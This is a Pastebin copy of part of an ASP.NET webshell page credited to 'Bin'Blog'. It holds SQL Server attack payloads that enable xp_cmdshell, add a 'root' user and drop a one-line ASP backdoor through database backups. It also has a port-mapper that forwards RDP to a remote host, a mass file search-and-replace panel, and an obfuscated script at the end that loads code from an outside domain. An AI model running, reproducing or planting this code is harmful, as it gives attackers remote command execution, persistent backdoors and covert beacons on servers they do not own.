  2525. <%--DataBase--%>
  2526. <div id="iDgmL" runat="server">
  2527. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
  2528. <div id="dQIIF" runat="server">
  2529. <div id="irTU" runat="server"></div>
  2530. <div id="uXevN" runat="server">
  2531. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
  2532. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
  2533. </div>
  2534. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
  2535. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
  2536. <div style="overflow-x:auto;width:950px" >
  2537. <p>
  2538. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
  2539. </p>
  2540. </div>
  2541. </div>
  2542. </div>
  2543. <%--PortMap--%>
  2544. <div id="hOWTm" runat="server">
  2545. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2546. <tr align="center">
  2547. <td style="width:5%"></td>
  2548. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
  2549. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
  2550. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
  2551. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
  2552. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
  2553. <%--Search--%>
  2554. <div id="yhv" runat="server">
  2555. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2556. <tr align="center">
  2557. <td style="width:20%" align="left">Keyword</td>
  2558. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  2559. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
  2560. </tr>
  2561. <tr align="center">
  2562. <td style="width:20%" align="left">Replace As</td>
  2563. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  2564. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
  2565. </tr>
  2566. <tr align="center">
  2567. <td style="width:20%" align="left">Search FileType</td>
  2568. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
  2569. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
  2570. </tr>
  2571. <tr align="center">
  2572. <td style="width:20%" align="left">Path</td>
  2573. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
  2574. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
  2575. </tr>
  2576. </table>
  2577. <br/>
  2578. <br/>
  2579. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
  2580. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
  2581. </asp:Table>
  2582. </div>
  2583. </td></tr></table>
  2584. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.rootkit.net.cn" target="_blank">Bin'Blog</a> All Rights Reserved.</div></div>
  2585. </form>
  2586. <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264DTDSJQU%2631MBOHVBHF%264E%2633kbwbtdsjqu%2633%2631TSD%264E%2633iuuq%264B00s68d%3A%3A/dpn0o4xti4m0dj%7B/kt%2633%264F%261B%261B%264D0TDSJQU%264F%261B%261%3A%261%3A%261%3A1')</script>
  2587. </body>
  2588. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top